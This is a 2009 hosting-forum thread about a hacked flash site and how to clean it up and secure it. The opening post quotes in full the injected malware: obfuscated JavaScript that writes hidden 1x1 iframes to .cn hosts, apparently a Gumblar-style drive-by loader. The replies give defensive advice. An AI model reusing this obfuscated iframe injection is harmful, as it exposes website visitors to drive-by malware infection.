Results 1 to 14 of 14
  1. #1

    Securing Website - hacked

    We have a simple flash site. Not CMS or anything of that sort.

    Recently out site was hacked. Nothing malicious as the only code that seems to have changed was out index file in which they injected a malware script
    Code:
    "</script>
    <BODY bgcolor="#A19D9A"><script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script><script>document.write("<if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"><"+"/ifram"+"e" +">");</script><script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script><script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@& (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!% $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@& [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))</script>"


    Just short of compromised FTP usernames/passwords, what other vulnerability could there be, just short of the physical webhosting server being compromised should I check as well.
    We are currently hosting with Mosso.
    Last edited by bear; 07-20-2009 at 07:54 AM. Reason: code tags added

  2. #2
    Join Date
    Jun 2009
    Location
    Singapore
    Posts
    202
    Well, have you considered that there might be vulnerabilites in the host's control panel system?

    The host might not have updated their control panel system. Hence, it might have some dangerous security flaws that allow hackers to gain control of your site.
    bikster.com - Quality Hosting. Affordable Prices.
    Providing premium quality shared and reseller cPanel/WHM hosting at low prices!
    Reseller cPanel/WHM hosting solutions that you can afford

  3. #3
    The basic idea is that an attacker loads the content of an external site into the site, sets the external content to be invisible and then overlays the page you're looking at. When you click a link you see on the current page, you are in fact clicking on the externally loaded page and about to load pretty much whatever the attacker wants.


    The attack usually have 2 steps. First one is password harvesting and next one is mass modification of files.

    Even if only one ftp account in the entire server is compromised, it is enough for all other sites to be injected.

    Always make sure none of your directories have 777 permission.

    Also there is a chance that for the intruder to install some kinds of c shells and to execute a loop which will modify all index files in the server.




    The most probable way for this to be done is by compromised ftp account.

  4. #4
    Join Date
    Jun 2006
    Location
    NYC
    Posts
    1,446
    Quote Originally Posted by adminpj View Post
    The basic idea is that an attacker loads the content of an external site into the site, sets the external content to be invisible and then overlays the page you're looking at. When you click a link you see on the current page, you are in fact clicking on the externally loaded page and about to load pretty much whatever the attacker wants.


    The attack usually have 2 steps. First one is password harvesting and next one is mass modification of files.

    Even if only one ftp account in the entire server is compromised, it is enough for all other sites to be injected.

    Always make sure none of your directories have 777 permission.

    Also there is a chance that for the intruder to install some kinds of c shells and to execute a loop which will modify all index files in the server.




    The most probable way for this to be done is by compromised ftp account.
    Compromised FTP account or some vulnerable scripts running on your site.

    First thing I'd do is bring the box down. Do a full once-over and/or a complete rollback.

    Check all of the logs and make sure this isn't someone that come in through a brute forced account, etc.
    FiberPeer.Com | | REAL DDoS Protection | Cloud Hosting | VPS | Dedicated Servers | High Bandwidth Hosting | 1Gbps-10Gbps Unmetered
    FiberPeer DDoS Mitigation | ethProxy Upgraded! | 14-Years Experience | Emergency 24/7 Support
    Visit us @ www.fiberpeer.com

  5. #5
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    Hi,

    First of all you need to confirm this malicious code is not inserted in to other files. We can search for the code and replace it using script.

    Please follow the flowing steps in the server

    1) Change your root password
    2) Change the password of the concerned ftp username
    3) Enable Apache Suexec and compile php as SuPHP
    4) Install latest security tools like mod_sec etc
    5) Secure /tmp
    6) Scan the server frequently with latest scanning tools
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  6. #6
    Join Date
    Oct 2007
    Location
    Moldova
    Posts
    103
    Hi,

    you have a malware on your PC or on someone PC that used FTP password for your hosting.

    what you need to do:

    1. Check your PC with antivirus
    2. Change FTP/email/control panel passwords
    3. Be happy

  7. #7
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,001
    There is a known compromise floating around now that actually resides on the client computer that normally FTPs data to a server, which gathers the ftp plain text passwords used in the ftp client app. This is, from what has been seen, based on iframes, which sure fit your report.
    If this is the case, you need to change your ftp password on the server from a clean computer, then set about cleaning up the compromised workstation.

    Some info - http://www.pdgsoft.com/blog/archives/108
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  8. #8
    Join Date
    Mar 2009
    Location
    Santa Monica, CA
    Posts
    3,372
    It looks like something one would receive from a malware site, which would mean someone was browsing the internet on the server(s) that is hosting your site.

  9. #9
    Try changing your FTP client. FileZilla is a good one.

  10. #10
    Join Date
    Apr 2009
    Posts
    839
    files permissions, you're most likely using suphp, so doublecheck your permissions, 644 for files and 755 for folders. Not more!

  11. #11
    Securing your scripts and also securing your PC.
    Support Facility | 24/7 web hosting technical support services
    Technical support | Server management | Data migration

    Technical Articles

  12. #12
    Join Date
    Mar 2005
    Location
    USA
    Posts
    519
    Try changing your FTP client. FileZilla is a good one.
    Except it is as vulnerable as all the others if the PC is infected with Gumblar etc.

  13. #13
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    2,001
    Exactly...if he's already infected with a Gumblar strain, changing FTP clients will be of little use.
    Nothing you can do on the server side, except reset your FTP passwords (which you should do immediately anyway) will help. It's totally a client side issue.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  14. #14
    Join Date
    Oct 2008
    Location
    Chicago, IL
    Posts
    190
    It is a typical iframe injection from compromised FTP credentials as many have mentioned above.

    Install a new anti-virus program on all the PCs with FTP access to your site. The reason for this is that the virus obviously knows how to evade detection of your current AV program.

    We've had good success recommending AVG, Avast or Avira.

    Then scan and clean the PCs with the new AV program.

    Then and only then can you change the FTP passwords. Change all of them if you have more than one FTP account on your site. If you have FTP access to any other sites, you had better change those passwords as well as they're either already hacked or will be very soon through the same method.

Similar Threads

  1. Website has been hacked!
    By sir_han in forum Hosting Security and Technology
    Replies: 10
    Last Post: 05-01-2009, 05:44 AM
  2. Website Hacked
    By zapinfotech in forum Hosting Security and Technology
    Replies: 9
    Last Post: 04-06-2009, 03:33 PM
  3. Help, Website hacked!!!
    By mgm75 in forum Web Hosting Lounge
    Replies: 15
    Last Post: 08-30-2005, 11:56 AM
  4. if ur website got hacked?
    By saj in forum Web Hosting
    Replies: 33
    Last Post: 04-08-2003, 06:48 AM
  5. Securing a website....
    By joeaper in forum Hosting Security and Technology
    Replies: 7
    Last Post: 01-10-2003, 07:52 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •